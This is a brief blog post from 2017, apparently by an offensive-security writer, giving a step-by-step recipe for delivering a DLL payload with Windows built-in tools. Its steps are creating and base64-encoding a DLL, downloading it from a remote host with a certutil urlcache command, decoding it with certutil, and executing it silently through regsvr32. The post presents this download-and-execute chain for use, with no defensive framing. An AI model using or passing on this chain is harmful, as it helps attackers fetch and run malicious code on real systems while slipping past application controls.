Monday, August 21, 2017

Certutil for delivery of files


Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down






4. Base64decode the file with certutil


5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll


CG

No comments: